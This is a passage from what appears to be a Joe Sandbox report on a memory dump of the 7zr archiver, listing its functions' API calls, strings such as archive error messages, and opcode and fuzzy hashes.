                        • Instruction Fuzzy Hash: FE51D371804685AEDF3BDF6488A3FFD7BB1AF16300F1A485ED096D60A2D7225D88D701
                        APIs
                        • __EH_prolog.LIBCMT ref: 0038A4F8
                          • Part of subcall function 0038A384: __EH_prolog.LIBCMT ref: 0038A389
                          • Part of subcall function 00389E14: GetSystemInfo.KERNEL32(?), ref: 00389E36
                          • Part of subcall function 00389E14: GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 00389E50
                          • Part of subcall function 00389E14: GetProcAddress.KERNEL32(00000000), ref: 00389E57
                        • strcmp.MSVCRT ref: 0038A564
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$AddressHandleInfoModuleProcSystemstrcmp
                        • String ID: -
                        • API String ID: 2798778560-3695764949
                        • Opcode ID: 9d7945b093f56863371ceefa7c1763a1e55f390b22a308bec971178a24a936ad
                        • Instruction ID: 9b2189dcfdee7c1690f57098658d1b57d3669f541727bfecec8502e6e6801c15
                        • Opcode Fuzzy Hash: 9d7945b093f56863371ceefa7c1763a1e55f390b22a308bec971178a24a936ad
                        • Instruction Fuzzy Hash: 4B319A31D00709DBDF07FBE0D8529EEB775AF40310F1040AAF80176192DB756A85CB62
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: 0$x
                        • API String ID: 3519838083-1948001322
                        • Opcode ID: 28dd31e786b8957529458c612959d65c6d8e9d2680233613ce9f4851044e164e
                        • Instruction ID: 96fd68c246f0ff2e482914640ae809555fbdd45d7bacf40b236fd39b1ab0bd0e
                        • Opcode Fuzzy Hash: 28dd31e786b8957529458c612959d65c6d8e9d2680233613ce9f4851044e164e
                        • Instruction Fuzzy Hash: 3B218732E01219DBCF06EB98D5966EEB7B5FF48304F11006AE9017B242DB795E04CBA1
                        APIs
                        Strings
                        • Cannot open the file as archive, xrefs: 003B86D0
                        • Cannot open encrypted archive. Wrong password?, xrefs: 003B8698
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs
                        • String ID: Cannot open encrypted archive. Wrong password?$Cannot open the file as archive
                        • API String ID: 1795875747-1623556331
                        • Opcode ID: 5a99483707bb66193002a0057f198f14b5d2774918a3c1f58b61b01fb085d847
                        • Instruction ID: 5afcd645019b73df686ad8af0a6ea3f36a46229a18b2fe83c8700fa271b086c5
                        • Opcode Fuzzy Hash: 5a99483707bb66193002a0057f198f14b5d2774918a3c1f58b61b01fb085d847
                        • Instruction Fuzzy Hash: B30144313042005BC616A754D495BAEB3ABAFC8718F64445BE7028BE85DF74A812DB55
                        APIs
                        • __EH_prolog.LIBCMT ref: 003E4039
                          • Part of subcall function 003E40BA: __EH_prolog.LIBCMT ref: 003E40BF
                          • Part of subcall function 003C5E2B: __EH_prolog.LIBCMT ref: 003C5E30
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: D.C$T.C
                        • API String ID: 3519838083-2951376840
                        • Opcode ID: a9c46ab8f94bc12c1ab5540be4f8eba2e42b845838db0f3861bf95fb4ef6e5a3
                        • Instruction ID: 6817a694d8ee0c6814dbb2a20dab5c70891f3fee5427873eafe3ab1a5a31ed9a
                        • Opcode Fuzzy Hash: a9c46ab8f94bc12c1ab5540be4f8eba2e42b845838db0f3861bf95fb4ef6e5a3
                        • Instruction Fuzzy Hash: 37017CB1A00B20CFC724DF65D50669AFBF4AF08704F10C92ED09A97741DBB4AA48CB85
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs
                        • String ID: =
                        • API String ID: 1795875747-2525689732
                        • Opcode ID: f9f2e2d5338a22894833d50f1383a6842b75ecb15473c07fabc7b753f0bb369f
                        • Instruction ID: 181ef0888253eef8f105e7bced9f8291c3cdb2ac5092b770c2ad1225a7c9263e
                        • Opcode Fuzzy Hash: f9f2e2d5338a22894833d50f1383a6842b75ecb15473c07fabc7b753f0bb369f
                        • Instruction Fuzzy Hash: E9E0D835F00124D7CB01B7E99C428FE7B7DEB847147900832E610CB240EB709926CBD4
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs$fputc
                        • String ID: `&D
                        • API String ID: 1185151155-100209823
                        • Opcode ID: 993ae42ec24d3fa2e6d8fd7ec737416bd64918c982d83866ededb36e716224b8
                        • Instruction ID: db64856ad8e33715a3eff6f27465275fce0f5ac0950378c8646bc1569a19badf
                        • Opcode Fuzzy Hash: 993ae42ec24d3fa2e6d8fd7ec737416bd64918c982d83866ededb36e716224b8
                        • Instruction Fuzzy Hash: 3DD02B7370111467C7323BE96C41C9F771CEFC9B14356045BF64097222C6656D515FE4
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs
                        • String ID: Unsupported Windows version$p&D
                        • API String ID: 1795875747-3838269546
                        • Opcode ID: 828601781fd7ee217816c5ff5f548ed1952bf6c6aabbef700bdff5ef1f4bf93b
                        • Instruction ID: d502e0de17a711bb6549cc2c68942ebfe5104cb5e73f5982a271f100d8ab889e
                        • Opcode Fuzzy Hash: 828601781fd7ee217816c5ff5f548ed1952bf6c6aabbef700bdff5ef1f4bf93b
                        • Instruction Fuzzy Hash: 6FD0A777304100DFD7154B88F947BA43760E38C720F60442BE103C5490D7B56001CA04
                        APIs
                        • memcmp.MSVCRT(?,004348A0,00000010), ref: 003E41D6
                        • memcmp.MSVCRT(?,00430168,00000010), ref: 003E41F1
                        • memcmp.MSVCRT(?,004301E8,00000010), ref: 003E4205
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: memcmp
                        • String ID:
                        • API String ID: 1475443563-0
                        • Opcode ID: c71bd2c90fa51386fc0a8bd63ca675940e9084d271a5097a2855cb1298a3e17f
                        • Instruction ID: 4e02a35d0c8ae2f50d9117a136740d18fdae448ad0d558adf98f17c25e0779c6
                        • Opcode Fuzzy Hash: c71bd2c90fa51386fc0a8bd63ca675940e9084d271a5097a2855cb1298a3e17f
                        • Instruction Fuzzy Hash: FE01043134020567DB114A12DC42FFD73A8AB6C720F154A2EFF45DB2C1F6B9E991A2C8